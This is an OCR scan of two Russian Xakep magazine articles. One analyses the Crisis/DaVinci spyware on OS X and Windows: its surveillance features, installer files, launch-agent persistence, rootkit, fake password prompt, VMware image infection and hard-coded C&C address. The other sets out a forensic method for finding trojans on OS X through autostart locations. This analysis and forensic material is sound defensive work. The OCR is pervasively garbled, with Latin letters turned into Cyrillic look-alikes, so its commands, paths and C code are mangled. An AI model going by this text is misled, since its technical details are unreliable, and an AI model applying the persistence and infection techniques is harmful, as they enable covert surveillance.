• аудио- и видеосъемка с использованием обнаруженных 
микрофона и веб-камеры; 

• запись нажатий клавиш клавиатуры; 

• сохранение содержимого буфера обмена; 

• снятиескриншотовэкрана; 

• кража информации из адресных книг; 

• слежениеза активностью пользователя в браузере; 

• перехват сообщений в приложениях Іпзіап* Меззепдег и 5куре; 

• получение\М-Рі-информации (в ѴѴіпсіоѵѵз-версии), такой 

как идентификатор сети 55Ю и мощность сигнала Н55І, это по- 
зволяет определять расположение зараженного компьютера. 
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Рис. 5. Перечень целевых приложений Сгівіз 



Перечень целевых приложений см. на рис. 5. 

Далее будет описываться одна из возможных Мас-версий ин- 
сталлятора Сгізіз, который имел внутри себя следующие файлы: 

• І2зВ0Ѵ7Х.-МР — основной модуль; 

• еіѴ№1дсІ.С{р — конфигурационный файл; 

• ИІпзАЗСі.Вг7 — модуль внедрения в целевые процессы; 

• ѴѴеРІхрВІІ.ѵѵА — руткит для 32-битной платформы; 

• бЕадуРіо.гІК — руткит для 64-битной платформы; 

• я45іуЬ — ТІРР-файл с иконкой. 

Конфигурационный файл еіУ N21 дсІ.С^р, содержащий, в частно- 
сти, ІР-адрес управляющего центра, зашифрован фиксированным 
128-битным ключом по алгоритму АЕ5. 

Инсталлятор содержит в себе множество компонентов, про- 
цедура их установки зависит от того, имеются ли у текущего поль- 
зователя права администратора системы, а также от версии 05 X. 
При установке с правами гоо* пути имеют вид: 

• каталог для файлов Сгівіз 
/иЬгагу/ВсгірІіпдАсісІіІіопз/аррІеНЮ/; 

• файл модуля внедрения 

/иЬгагу/БсгірііпдАсігііііопз/арріеНЮ/СопіепІз/МасОБЛфайл}; 

• файл автозагрузки 

/иЬгагу/І_аипсЬАдепІз/сот.аррІе.тсіѵѵогкег.рІІ5І; 

• файл руткита 

/иЬгагу^сгірІіпдАсісііІіопз/аррІеНІО/СопІепІз/Незоигсез/^ 
{имя файла}.кехІ/СопІепІз/Мас05/{имя файла}. 

Для автозапуска Сгізіз использует сходную с РІазЬРаке методику 
использования 5сгір1іпд Асісііііопз — ссылка на основной модуль 
І2зР0У7Х.-МР помещается в файл сот.арріе.тсіѵѵогкег.ріізі, что обе- 
спечивает передачу ему управления при запуске любого приложе- 
^ ния. Режим установки руткита определяется специальной перемен- 
! ' ной — символьной строкой, принимающей значения «АЬ56К» или 
«АЬ57К». Одно из этих значений жестко задавалось в коде в виде 



ЧТО ТАКОЕ АРТ? 

Термин АРТ (АсІѵапсесІ Регзізіепі ТЬгеаі) был введен Военно- 
воздушными силами США в 2006 году для описания нового класса 
атак. Вредоносы, подпадающие под эту категорию, отличаются 
точным целенаправленным воздействием и постоянной 
ручной корректировкой процесса получения информации, 
что подразумевает тщательный сбор данных о будущей 
жертве. В качестве примера можно привести случай, когда 
в ходе проведения пентеста аудиторы узнали о пристрастии 
администратора сети к аниме, создали свой сайт, раскрутили 






его и завлекли на него админа. После этого были украдены куки 
и осуществлен вход в систему от его имени. Пример, конечно, 
не совсем корректный. В современных реалиях на сайте бы 
разместили эксплойт уязвимости браузера, который использует 
админ. В настоящее время под АРТ подразумевают вредоносное 
ПО, адресно рассылаемое конкретным лицам через электронную 
почту и внедренное в файлы ООС, РТР или РЭР. Запуск 
осуществляется через эксплойтуязвимостей приложений, которые 
открывают файлы данных форматов. 

А 
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константы. При значении «АЬ57К» производится попытка уста- 
новки руткит-компонента из-под учетной записи с ограниченными 
правами путем запроса у пользователя пароля через подложную 
форму. Эта форма отображала иконку «Бузіет Ргеіегепсез», которая 
содержалась в ТІРЕ-файле ц45іуЬ. При значении «АЬ56К» руткит 
устанавливался, только если пользователь сидел под рутом. 

Функционально версии Сгізіз для Мае и ѴѴіп почти идентичны, 
но ѴѴіп.Сгізіз имеет несколько дополнительных фишек, о которых сто- 
ит упомянуть. Шпионский функционал дополнен кражей информа- 
ции пользователя из ІасеЬоок.сот (друзья], ІѵѵіКег.сот (фолловеры) 
и дтаіі.сот (мыло), вероятно для использования в методах социаль- 
ной инженерии. ѴѴіпсіоѵѵз-версия имеет механизмы самораспростра- 
нения. В частности, ѴѴіп.Сгізіз заражает мобильные устройства под 
управлением ѴѴіпсІоѵѵз МоЬіІе и ѴѴіпсІоѵѵз ЕтЬесИесі (но не ѴѴіпсІоѵѵз 
РЬопе) и распространяется через 115В РІазЬ носители, используя ме- 
тод Біихпеі — уязвимость в обработке ярлыков М510-046. Кроме того, 
заражаются образы виртуальных дисков ѴМѵѵаге. Остается только 
догадываться, зачем нужна такая функция, но она есть. 

Для инфицирования виртуальных машин в файле %ІІ5егРго1іІе%\ 
Арріісаііоп 0а1а\ѴМѵѵаге\ргеіегепсез.іпі ищутся строки, ссылаю- 
щиеся на файлы .ѵтх, которые содержат параметры отдельных 
виртуальных машин. Файл .ѵтх парсился для получения имени 
файла .ѵтсік, найденный файл монтировался как диск 1 при помощи 
утилиты командной строки ѴМѵѵаге ѵіхОізкМоипіБегѵег.ехе, и на него 
записывался инсталлятор по путям 2:\Ргодгат0аІа\МісгозоК\ 
ѴѴіпсіоѵѵ5\5іагІ Мепи\Ргодгатз\5іаг1ир\{имя файла} — для ѴѴіпсІоѵѵз 
ѴізІа/5еѵеп и 2:\0оситепІз апгі 5еиіпдз\АІІ 1)зег5\51аП МетД 
Ргодгатз\5іаг*ир\{имя файла} — для ѴѴіпсІоѵѵз ХР. Правда, процеду- 
ра для ХР терпела неудачу, возможно, это баг разработчиков. 

Многие антивирусные конторы называют Сгізіз по-разному. 
Бутапіес пошел на поводу у злоумышленников и использует наи- 
менование Сгізіз, как и было задумано. Казрегзку 1_аЬ называет эту 
вредоносную программу Могсиі, МісгозоК на пару с Езеі — ВоусЫ. 
Или вот компания Рг.ѴѴеЬ — имя, выбранное ими, РаѴіпсі, не слу- 
чайно. Сотрудники Іпіедо утверждают, что Сгізіз является частью 
системы удаленного управления ОаѴіпсі, разработанной компанией 
Наскіпд Теат І ѵѵѵѵѵѵ.Ьаскіпдіеат.іі ) из города Милана, Италия. Сами 
Наскіпд Теат позиционируют свой продукт как средство слежения, 
разработанное для использования правительствами и правоохра- 
нительными органами различных государств. Ценник потрясает во- 
ображение — целых 200 килоевро! В цену заложены обязательства 
по постоянному обновлению и поддержке продукта, пока конечная 
цель атаки по получению нужной информации не будет достиг- 
нута. Конкурентом на этом поприще является контора Ватта 
Іпіегпаііопаі ( \л/ѵѵѵѵ.даттадгоир.сопп ) из Великобритании со своим 
продуктом РіпРізЬег, под который даже собственный сайт запилили 
( ѵѵѵѵѵѵ.ііпіізЬег.сот) . В то же время эксперты Казрегзку І_аЬ утверж- 
дают: никаких конкретных доказательств, что Сгізіз разрабатывали 
в Наскіпд Теат, нет. Ну а лишних 200 тысяч евро, чтобы проверить, 
кто там и что разрабатывал, у нас в редакции не лежит :(. 

При анализе СгізІ5 выявилось большое количество багов про- 
ектирования. Например, инсталлятор проверял, не установлен ли 
уже Сгізіз в систему. Для этого производилось обращение к специ- 
ально созданному руткитом символьному устройству /сіеѵ/ріСРІІ. 
Фишка в том, что руткит, по своей сути, должен скрывать все свои 
проявления в системе, в том числе не светиться /сІеѵ/р^СРЦ), а ис- 
пользовать другие пути выявления своей запущенной копии. Вот 
такой простенький код для демаскирования файлов после Сгізіз: 



91 9 0*1Ы52в00 6*5000 0*4000 со*.ѵа»оге.кех'.ѵме««1 (0052.89.69) <11 5 4 3 1» 

92 О 0«1Ь533000 0**000 0*9000 со*. ѵ«*»ге.ке*4. ѵ»Ьд(* (0052.89.69) <5 4 3 1> 

94 0 ОдІЫЗеООО 0x2000 0*1000 геѵепе.риІ.*х.р«<сО-'**к-Гог-рів (1) <4 1» 

ік-3.2* | 

Рис. 6. Руткит Сгізіз «забыл» кое-что подправить 

#іпс1исІе <-РспТ1.Іі> 

ѵоіеі таіп(ѵоід) { 

іпі -РсІ = ореп("/с!еѵ/р-РСРІГ, о_Р01лІК); 
і* (« == -1) { 

ргіп*-Р("Сгі5І5 гооікіі: сіеѵісе поі -РоипсМ \п"); 

геТигп; 

} 

іпТ геі = іос1:1(-РсЦ 0х80ТТ6Ь26, "ХАКЕР" ) ; 

І± (геТ == -1) 

ргіпі-РС'РипсТіоп іосИ -Раііесі ! \п"); 

еІ5е 

ргіпТ-Р("Рі1ез Ьісісіеп Ьу Сгізіз иптазкесі!\п"); 



Еще баг — руткит скрывал себя в списке процессов ядра, 
но не подправлял их общее количество. В результате чего можно 
было наблюдать следующую картину (см. рис. 6). Ну и наконец, 
для связи со своим командным центром он использовал жестко 
заданный в конфигурационном блоке данных сервер с ІР-адресом 
176.58.100.37. Канал передачи шифровался, однако никакой авто- 
ризации при обмене данными с С&С не было предусмотрено вооб- 
ще! Исследователь внутренностей 05 X под псевдонимом геѵегзег 
провел некоторые изыскания и выяснил, что, если взять тушку 
Сгізіз и выдрать из нее конфиг, не составляет большого труда по- 
менять адрес С&С на свой, зашифровать все обратно и внедрить 
конфиг на место. Правда, возникают трудности с управляющим 
центром. Для того чтобы его получить, нужно либо ломать сервак 
и сливать все скрипты с него, либо «немножко» отреверсить 
Сгізіз и написать свою версию. В любом случае это получится 
дешевле 200 тысяч евро. Кстати, на сайте геѵегзег І геѵегзе.риі.аз ) 
можно найти массу интересной информации на английском языке, 
касающейся исследований таіѵѵаге под 05 X. 



ЗАКЛЮЧЕНИЕ 



Думаю, к этому моменту ты уже убедился, что компьютеры Мае 
не обладают абсолютным иммунитетом к вредоносным про- 
граммам. Конечно, по сравнению с объемом вредоносного 
ПО для ѴѴіпсіоѵѵз количество зловредов для 05 X пока незна- 
чительно. Но и масштабы распространенности платформы Мае 
несопоставимы с ѴѴіпсіоѵѵз. Со стороны пользователей Мае было 
бы наивно полагать, что они защищены от атак таіѵѵаге на все 
сто. Как показала практика, здесь тоже есть чем поживиться. Речь 
идет не только о массовых угрозах, таких как полумилионный 
ботнет РІазЬРаке, принесший хозяевам некоторое количество 
зеленых бумажек путем монетизации сервиса ВІаскБео и кликанья 
по рекламным баннерам. Тут вам и целевые атаки на конкретные 
цели, и шпионские схемы мониторинга пользователей отдельно 
взятых стран. Спрос есть, деньги солидные, за них можно и под 
05 X писать. Таким образом, угрозы для Мае вполне реальны, 
и в дальнейшем их число, скорее всего, будет только расти. Сле- 
’ дите за нашими публикациями! 31 



а ' ; . ВОПРЕКИ РАСХОЖИМ ПРЕДСТАВЛЕНИЯМ, 

КОМПЬЮТЕРЫ МАС НЕ ОБЛАДАЮТ АБСОЛЮТНЫМ 
ИММУНИТЕТОМ К ВРЕДОНОСНЫМ ПРОГРАММАМ 
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Алиса Шевченко, директор по исследованиям, «Цифровое оружие и защита» (Еваде ЬаЫ ІШаІіваеваде) 



Оврагах 
семейства 
кошачьих - ■■ 






ПОИСК ТРОЯНОВ 
В 05 X: СИСТЕМНЫЙ 
ПОДХОД И МЕТОДЫ 
ФОРЕНЗИКИ 



В любой современной 
системе бесконечно много 
точек, в которых может 
проявляться присутствие 
трояна. Хаотичный анализ 
всех этих точек не только 
трудоемок, но и в корне 
неверен. 
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О врагах семейства кошачьих 



МасВоок- Ат г-аіі $ а:~ изег$ # фііск апаі 

МасВоок-Аі г-А1і$а:~ и$ег$ * 800 $\е "сов.рготзе.ймѵег . 5 »ех“ *> 45 ге$иИ$, зігапге! 

МасВоок-Аі г-АІіза:- и$ег$ 

МасВоок - Аі г - Аіі за : ~ и$ег$ І5 /$у5іе»/1л Ьгагу/Ехіепзюпз/ | $гер ргожізс 

МасВоок-Аі г -АН 5а: ~ изег$ шсіТт псі -опіуіп /$у5*е*/ІлЬгагу/Ех*еп5іопз/ "ргояп 5 е" 

/5у5 *ет/1л Ьгагу/Ех Іепзі оп$/Рго«п зе$ТЕХ . кех I 

МасВоок-Аі г-АІіза:~ изег$ саі /5у5*еа/ІіЬгагу/Ехіеп$юп5/Рго»п$е$ТЕХ.кех»/Соп*еп*5/Іп*о.р1л5І | егер Ѵегзіоп 
<5«пп8>Ѵегзіоп: 5.0.62. Сорум*м (с) 2Ѳ1Ѳ Рготзе ТесЬпоІо*іе 5 . Іпс.</ 5 <пп*> 

<кеу>СРВип(іІеІп*оОі сІіопагуѴегзюп</кеу> 

<кеу>СРВип(і1е5Ііог *Ѵег5іоп5*гіпг</кеу> 

«кеу>СРВип(ЛеѴегзіоп</кеу> 

<кеу >0ТР1.аИогтѴег5іоп</кеу> 

МасВоок-Аі г-АІіза:~ изег$ 

МасВоок-Аі г-А1іза:~ изег$ * ^оо^іе -р гов15е ТесНпоІо8іе$, Іпс.“ 

МасВоок - Ат г - А1л за : ~ изегі 9 Ргоаізе ТесЬпоІосіез, Іпс. | АТА РАЮ сопігоііегз ап(1 зиЬзуз^етз 

МасВоок-Аі г-А1іза:~ изег^ 9 зЬоіЛсі Ье 0К 

МасВоок-Аі г* АН за изег$ | 



Быстрый анализ подозрительного модуля 




ундаментальная задача при ручном поиске троянов — свести 
бесконечное многообразие троянских признаков к минималь- 
ному количеству векторов поиска, грамотная проработка 
которых гарантирует достижение цели. Нужно понять суть троянской 
программы, ее системообразующий принцип. Зная принцип, разрабо- 
тать надежный алгоритм поиска зловредов в произвольной системе, 
даже ранее неизвестной, — дело техники. Это то, чему мы учим на сво- 
их семинарах, где готовят настоящих сисадминов-киберниндзя. 

Итак, вначале общий принцип, затем универсальная методика 
и наконец — особенности Мака. Но сперва — сіізсіаітег: 

1. Мы ищемтолькоядроатаки— троян, которыйживетвсистемеисо- 
вершаетв ней какие-то действия. Мы не ищем одноразовыетрояны 
(это бессмысленно), компоненты доставки трояна, такие как бгіѵе- 
Ьу-скрипты, эксплойты, дропперы (это задача для отдельного ис- 
следования) и засвеченные на той или иной конференции концепту- 
альныетехники (большинство из них неприменимы в реальности). 

2. Если обследуемая система представляет ценность как мишень 
для промышленного или политического шпионажа, то материалов 
этой статьи заведомо недостаточно, так как целевые трояны про- 
ектируются сучетом известных методикфорензики. 



ПРИНЦИП 



У любого трояна есть несколько фундаментальных «жизненных по- 
требностей». Это первичные классовые признаки, которые харак- 
терны абсолютно для всех троянов, независимо их от функционала 
и платформы. Вот они: 

1. Троян где-тохранитсвой код. 

2. Троян откуда-то получаетуправление в процессе загрузки системы. 

3. Троян реализует свое предназначение (нагрузка и контакте хозяином). 

4. Троян может скрывать все вышеперечисленное. А может не скрывать. 

Идея в том, чтобы сфокусироваться только на поиске этих первичных 
признаков, и только тех из них, которые действительно необходимы. 

На самом деле достаточно поиска по одному пункту (2). Любой 
троян откуда-то стартует, поэтому грамотный анализ этого вектора — 
для краткости назовем его «автозагрузки» — может дать такой же 
результат, как если бы мы последовали всему плану, но с меньшими 
усилиями. А руткиты мы просто обойдем стороной: руткит может 
скрыть что-либо только в работающей системе, а мы анализируем 
систему в статике. 

Итак, поскольку поверхность анализа нормирована до предела, 
алгоритм поисков должен быть исчерпывающим «Ьу сіезідп», чтобы 
ничего не упустить. 



АЛГОРИТМ 



0. ПОДГОТОВКА 

Перед ручным анализом должны быть быстро исчерпаны тривиальные 
и автоматизированные методы поиска вредоносного кода (антивиру- 
сы, антируткиты, визуальный просмотр списка процессов и прочие). 
Ценность антивирусов невелика, но было бы глупо потратить час 
собственных интеллектуальных ресурсов на поиск известного трояна, 
который антивирус найдет за десять секунд. 

1. АВТОЗАГРУЗКИ 

Составляем перечень всех известных точек старта кода для целе- 
вой системы. Не забываем, что в процессе загрузки системы могут 
исполняться не только приложения пользователя, но и модули ядра, 
задания планировщика, скрипты, код предзагрузки системы (МВР, 
ИЕН) и так далее. 

Основные источники информации — первичная документация 
для разработчиков, «библии» для системных администраторов, ис- 
следовательские материалы. Важно на этом этапе: 

• чем полнее переченьавтозагрузок,тем больше вероятность найти 
троян, даже самый продвинутый; 

• чем лучше приоритизирован переченьпостатистической вероятно- 
сти обнаружения трояна, тем меньше времени займет поиск. 

2. АНАЛИЗ 

Отключаем систему, монтируем жесткий диск к заведомо чистой 
системе (либо загружаемся с внешнего диска) и методично анали- 
зируем пункты составленного перечня на предмет подозрительных 
элементов. 

Если элемент перечня не является файлом (например, ключ ре- 
естра в системах семейства ѴѴіпсіоѵѵ5) — используем утилиту для ста- 
тического парсинга соответствующего хранилища (в данном случае 
гедіоокир, гедтоипі и множество им подобных). 

Анализ автозагрузок в работающей системе также возможен, 
но может дать ложные результаты, так как мы умышленно пренебрег- 
ли выявлением руткит-перехватов для экономии времени. 

Особый случай — вирусный механизм загрузки, когда код стартует 
не из известной точки автозагрузки, а из легитимного модуля. На се- 
годняшний день паразитный метод запуска кода достаточно редок, 
а его известные агенты (ЮІ_, 2егоАссе55) должны быть уже найдены 
на этапе «О» с помощью антивирусных утилит. Для критичных систем 
(см. сіізсіаітег, пункт 2) имеет смысл хранить заведомо чистый слепок 
системы, относительно которого можно обнаруживать модификации 
в исполнимых файлах. 




ХАКЕР 03/170/2013 



021 







С0ѴЕК5Т0КѴ 



НасВоок- Аі г • А1иа:~ и*ег$ • Іі$Ппк о* поп-АооІе кегпсі водиіеі 
(7ог*еІ ксхіаіві • «с’ге дот* «Іаіісаі апаіуя*!) 

МзсВоок Аіг -А11»а:~ и«г$ 

Н*сВоок-А1г-А11*»:~ о*«г$ саі ' Ипд /$у*и»/иЬгагу/ЕхІ«п*1оп9/ -паае ІпТо.рІІЯ' I 

*гер -СР8ипдІвІдепІі1іег* -А 1 | *гер -ѵ соа.арр\е | *гер -Р Ѵ*\.. , \.* | аѵк ‘а !- Л; (ИМ' 

саі: /$у*Іе»/1.іІ>гагу/ЕхІепяоп*//0опІ: Но *исЬ іііе ог дігесіогу 

саі: $ІеаІ : Но іисіі Тііе ог дігесіогу 

саі: Нас: N 0 *исЬ *Пе ог дігесіогу 

саі: 05: N 0 *осГ> Ш« о г дігесіогу 

саі: X . кехІ/СопІепІ*/ Іпіо.ріізі: Но *осЬ ІІІе ог дігесіогу 
•*ігт*>со*. Ассм*у*.дгіѵег .Асххх«/*ігіп*» 

< 5 Іг 1 п* >соа . АТТО . дг і ѵег . АТТОСеІег 1 ІуРС» / Яг 1 п* » 

<*1гт*»сон. АТТО.дгіѵег .АТТОСеІегі іуЕС8</5Імп*» 

«*1г1п*>со«. АТТО. дп ѵег . АТТ0Ехрге**РСІиі4«/*ІПп*> 

« 5 Ігіп*>соа. АТТО.дгІ ѵег .АТТ0Е*рге555А$И8А</5Ігіп*> 

«*ІМп*»со» . АТТО. дгі ѵег . АТТ0Ехрге**5А$М8А2«/*Ігіп*» 

» 5 ІИп*>соа . АТТО . дп ѵег . АТТ0Ехрге*і5А5Р.Л10</5Іг1п*> 

<5Іпп*»соа. АТТОдп ѵег . АТТ0Ехрге5*$А$КА1О?</5Іг1п*> 

<*імп*>)р.со.сапоп.Ь) ргіпі . В.іи$8іоа0«/*ігт*> 

«*ІМп*>соа.Са10і*і I .дгі ѵег.Н0Рго</5Ігт*» 

«*1гт*>соа ер*оп. ргіпі. кех I і)58РгіпіСІа**</*ігіп*» 

»5імп*>соа.РТ01 .дпѵег .РТ011)$85егіа10гіѵег»/5Ігіп*» 

« * I п п* »соа . М *ьроі п I • ІесН . кех I . Ні *нРоі пі 1 0Р< / * I г і п* » 

«5ІМп*>еоа.М *Ьроті- Іеси кехі .Иі*НРоіпіКК«/5Ігіп*> 

< * I г 1 п* >соа . Ьі *Ьраі и I • ІееН . кех I . НІ *НРоі п ІРК644< / * I г 1 п* > 

<*ігіп*»соа.ьр.ргті . (іріо.Рея*п)еі.кехі</*ігіп*> 

«5Іг1п*»еоа .Ир. ргіпі .Нрю. 0е5к)еІ .кех1«/5ігіп*> 

«5ІМп*»соа.1ір.кехІ.»ір-Тах-іо</9Іг1п*» 

«Ягіп*>соа.Нр.ргіпІ Ьрт. Іпк)е11 кехІ»/ЯМп*» 

« 5 Ігіп*»сов Ьр. ргіпі .Ьрт. 1пк)е12.кехІ»/Ямп*> 

«ЯМп*»со« . Ьр ,рг і пі . Ьрю. Іпк)еІЗ.кехІ«/ЯМп*» 

< 5 ІМп*»соа.Ьр.ргіпІ.Ьріо. Іпк)е14.кехІ</*Ігіп*> 

«Ягіп*»соа.Ьр. ргіпі. Ьрю. Іпк)е15.кехІ»/Ягт*> 

«Ягт*»соа .ьр. ргті .нрю . тк)еі7.кехі«/5ігіп*» 

<5Ігт*»соаЬр. ргіпі. Ьрю. іпк)е18.кехІ*/Ямп*> 

«Ягіп*»сов.Ьр.рппі.Ьріо. Іпк)еі9.кехі«/Ягіп*» 

<*1мп*»соа.Ьр ргіпі .Ьрю. ІпЙеІ .кехІ</Яг1п*» 

«5Ігіп*«сов.Ьр.ЬрЮ Ьр-т рмпіегсІа55дг1ѵег-епаЫег«/Яг1п*> 

«*1гіп*»соа.ьр.рпп1.ьріо ла*ег)еі .кехІ«/Ягіп*» 

«5Ігіп*»соа.ьр.ргіпІ .»іріо.0ТТіееіе1.кехІ</5Ігіп*> 

«ЯМп*>сов Ьр ргіпі.ьріо.РЬоіоіаагі кехІ«/Ягт*> 

»5Іп п*>соа. Ир .ргіпі .нріо .РИоІовааг 1Рго.кех1«/Яг1п*> 

« Я г 1 п* »соа . Ьр Ирі о . Ир_р5а64Ѳ_і о_епаЫег< / $ I г 1 п* > 

<* I гі п* »со» Ир . Ирі о . ир”р*а 53Ѳ~63в_і о_епаб\ег «/ Яп п* * 

<зІг1п*»соа. )а1сгоп. .ІИ1сгопЛТА</Ягіп*» 

«»ІПп**со«.ргоаі*едгіѵег .*1ех«/япі**» 

<5Ігіп*>соа. яІаЬядгіѵег .СР218хѴСР0г1 ѵег</ЯНп*> 

«Япп* »соа. я ІаЬ$.дм ѵег . СР21вхѴСР0п ѵег64»/Ягіп*> 

«5ІПп*«С0*і 9оТІгаід.дмѵег.5оМРА1Р«/Ягіп*> 



Насбоок • Л і г • А1 1 *а : ~ 05егі * «у ІаипсЬА*епІ* 

Насбоок-Аі г -А1і*а:- иіег* ріиііі -сопѵегі хаІІ ІіЬгвгу/іаипсИА*епІ5/* .ріі Я -о - | *гер *»Ягіп*>/* 
«Ямп**/5уЯев/1.іЬгвгу/Ргавеѵогк*/А00ге*5боок. Ггавеѵогк/ 
Ре*оигсе*/Авоге**воок$оигсе5упс5сЬедиІеНеІрег«/Ягіп*» 
«Ягіп*»/АррІісвІіоп*/ѴігіиаІвох.арр/Сопі*Ы*/Иве05/ѵбохѵвР*гѵ</ягіп*» 

НасВоок -Аі г -Аіі *в : ~ о*ег5 

НасВоок - А і г - А1 1 *а : - изегі I* 1.1Ьгвгу/1.аипсЬЛ*епІ5/ | *гер -ѵ ѴрКіІ)' 

НасВоок -Аі г • Аіі іа: ~ изег$ 

Н.ісВоок-Аіг-АІі*а:~ и*ег$ • «ід*еІ воОиІеі 

НасВоок -Аі г -Аіі *а:- и»е«Л ріиііі -сопѵегі хаІІ ІіЬгагу/РгеІегепсез/ѴрІііІ -о - | *гер • . «0еІ</*Іг1п*>* 
«*Іпіі*>/1.іЬгагу/ѴіО*еІ*/51іекіе*.ѵО*1*/Ягіпе> 
»Ягіп*>/ІіЬгвгу/Ѵіо*еІЯ511скіе*.«0*і«/9Ігіп*> 
<ЯПп*»/І.іЬгагу/ѴіО*еІ*/СаІеиІвІог.ѵО*1</Ягіп*> 
<*1гіп*»/ііьгагу/ѵіо*еі*/0ісііопвгу. «о*і</Ягіп*> 

<5Ігіп*»/ііогвгу/ѵід*еі5/іСаІ «0*1</Ягіп*> 
<*Іг1п*»/110гагу/ѵі0*еІ5/Тгап5Іа11оп.«0*і«/5Ігіп*> 

< Яг і щ>/и бгагу/ ѵі осеіяѵог м сіоск. «аг1«/ямп*> 
<*Іпп*»Д.1ргагу/Ѵідсе15/ѴогІд Сіоск. «0*1*/5Іг1п*> 

«Ягіп*»/ІіЬсагу/Ѵід*еІ5/ІІп1 1 СопѵеПег.ѵд*1*/5Ігіп*> 
*Ягіп*»/ІіЬгагу/ѴіО*еІ»/ѴогІд Сіоск. ѵд*1« /Ям п*> 
*Ягіп*»/ИЬгагу/ѴіО*еІ5/ѴеаІЬег . «0*1»/ *1пп*> 

«Ягіп*»/І.іЬгагу/Ѵіо*еІ*/Е5РН, «0*1»/Яг1п*» 

**Ігіп*»/кіВгагу/Ѵіо*еІ*/РІі*иі Тгаскег .«д*1*/*1гіп*» 
«Ягіп*»/иьеагу/Ѵіо*еІ5/іСаІ. ѵ0*і«/япп*> 
<*Ігіп*>/і1Ьгагу/ѵі0*еІх/Иоѵіе5.«д*і«/Яг»п*> 

«Ягіо*>/ківгагу/ѵі0*е1і/5кі Керогі.«д*і«/Яг ш*» 
**Іпп*»/иЬгагу/ѴіО*еІ$/51оск5.«д*1«/*Ігіп*» 

<9Ігіп*>/ІіЬгагу/ѴіО*еІа/ѴеаІИег .«д*1»/*1ппе> 

*Ягіп*»/иЬгагу/ѵід*еі5/ѵеЬ СИр «0*і»/9ІНп*> 

**Ігіп*»/иіЬгагу/Ѵіа*«1»/А0дгеі5 Воок.«0*1»/Яг1п** 
<Ягіп*»/ііьгагу/ѵід*еі*/5ііскіеі.«о*і</Ягіп*> 
<Ягіп**/ІіЬгагу/ѵід*еі*/СаІсѵІаіог «д*1«/ЯПп*» 

«*ІПп* »/иіЬгвгу/Ѵ10*еІ*/0пі I Сопѵегіег »0*1«/Ягіп«> 
«*ІНп*»/і.іЬгагу/Ѵід*еі5/ѵогіо Сіоск «0*1 »/Ягіп*> 
<5Ігіп*»/ІіЬгагу/ѴЮ*еІз/Т11е 0аае.«д*1»/Яг1п*> 
< 5ІПпе»/11Ьгагу/Ѵ10*еІ5/Тгап5Іа11оп.«й*1</5Ігіп*> 
«Ягіп*»/11Вгвгу/Ѵід*еІ5/0ісІіопагу .«0*1</Ягіп*> 



Получение списка модулей ядра в статике 



Нои автозагрузки 



3. ИТОГ 

Сейчас у нас уже должен быть файл трояна. Если он не найден, а подо- 
зревать наличие в системе нетривиального целевого трояна нет осно- 
ваний, то причина может быть только одна: недостаточно тщательная 
проверка. Что-то упущено на одном из предшествующих этапов. Если 
файл трояна найден, осталось его изучить. Системный анализ вредо- 
носного кода — отдельная тема, рассмотрим ее как-нибудь в другой раз. 



ОСОБЕННОСТИ 05 X 



Троянская индустрия для Мака пока развита слабо. Для троянов нет 
необходимости изобретать концептуальные техники, так как успеш- 
но работают простые и документированные. Поэтому поиск трояна 
на Маке не должен составить труда или занять много времени. 

Для статического анализа файловой системы 05 X загружаемся 
в Біпдіе ІІзег Мобе (<Сотплапб + 5> при загрузке системы) и монтируем 
корневой раздел Гтоипі -ѵѵи /*). Как вариант, можно загрузить систему 
с заведомо чистого загрузочного диска и работать с 6111. Если си- 
стемный раздел зашифрован (Іедасу РіІеѴаиІІ, РіІеѴаиІі2), обращаемся 
к соответствующим инструментам для его дешифровки (см., например, 
ѴіІеРаиК и ІіЫѵсіе). 

Пользователи в 05 X ограничены в привилегиях по умолчанию. 
Поэтому наиболее велика вероятность того, что троян установился 
в один из пунктов автозагрузки, доступных для обычного пользовате- 
ля. С этих пунктов и начинаем анализ: 

• /І_іЬгагу/І_аипсЬАдепІ5/— приблизительный эквивалент ключа 
реестра НКС1)\...Рип в ѴѴіпсІоѵѵ/з; 

• /иЬгагу/Рге^егепсев/ — настройки меню, виджетов и многое другое + 
ссылки на соответствующие исполнимые модули; 
/ѵаг/аіАаЬ5/<и5егпате>, /и5г/ІіЬ/сгопЛаЬз/<и5егпате> и тому по- 
добное-файлы планировщика. 

При анализе автозагрузок нас интересуют все ссылки на файлы, 
указанные в стандартных для 05 X (рІізО или ІІІМІХ-нативных (например, 
сгопІаЫ конфигурационных файлах. На троянский исполнимый модуль 
может ссылаться как его собственный файл настроек ріізі, так и мо- 
дифицированный ріізі легитимного приложения (хотя вторая техника 



не встречалась мне іп 1Ье ѵѵііб). Чтобы не усложнять анализ, мы просто 
получаем ссылки на файлы из всех подряд директорий автозагрузки 
в порядке приоритета и оцениваем их на предмет подозрительности. 
Пример — мои автозагрузки: 

МасВоок-Аіг-А1І5а:~ изег$ ріиііі -сопѵегТ хтіі ИЬгагу/-' 
І.аипсНА§епТ:5/*.р1і5* -о - | §гер 'Чз-Сгіие»/” 
<5Тгіпб>/5у5І:ет/ІіЬгагу/Ргатемогк5/Аббге5 5Воок.-Ргатеѵі/огк/*-' 
Ке5оигсе5/Аббге55Воок5оигсе5упсБсИеби1еНе1рег</5І:гіп§> 
<5І:гіп8>/Арр1іса‘1:іоп5/\/ігТ:иа1Вох.арр/СопІеп-С5/Мас05/«-< 
ѵЬохмеЬ5гѵ</5І:гіп§> 

• Выдача предыдущей команды отфильтрована по сигнификатору 

• абсолютного пути поэтому надо проверить, что модуль 

• трояна не прописался в текущую директорию: 

МасВоок-Аіг-А1І5а:~ изег$ 1з ИЬгагу/^ 

1_аипсИАееп*5/ | 8 ге Р _ѵ " .р1І5*$” 

Анализируем ссылки на файлы примерно так: 

• Устанавливала ли я это приложение? Если нет: 

• Чтознаютвинтернетеомодулестаким именем?Если ничего или 
ничего хорошего: 

• Что я могу узнать об этом модуле за пять минут? (5Ігіпд5<тобиІе>, 
рзаих I дгер<тобиІе> и тому подобное) 

Подозрительные к этому моменту файлы складываем в отдельную 
папку и позднее анализируем более детально или отправляем на ана- 
лиз любимому производителю антивирусов. 

Если предположить, что трояну удалось повысить привилегии, 
список и его анализ усложняются. Ниже перечислены некоторые наи- 
более вероятные глобальные автозагрузки. 

• Точки старта системных демонов, приложений, заданий планиров- 
щика для всех пользователей: 

• /І_іЬгагу/5іагІирІ*ет5 

• /І_іЬгагу/І_аипсЬАдепІ5 

• /иЬгагу/І_аипсЬ0аетоп5 

• /5у5Іет/иЬгагу/І_аипсЬАдепІ5 
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О врагах семейства кошачьих 




• /5узІет/иЬгагу/І_аипсб0аетопз 

• /ЫЬгагу/РгеІегепсез/ 

• /еІс/сгопІаЬ 

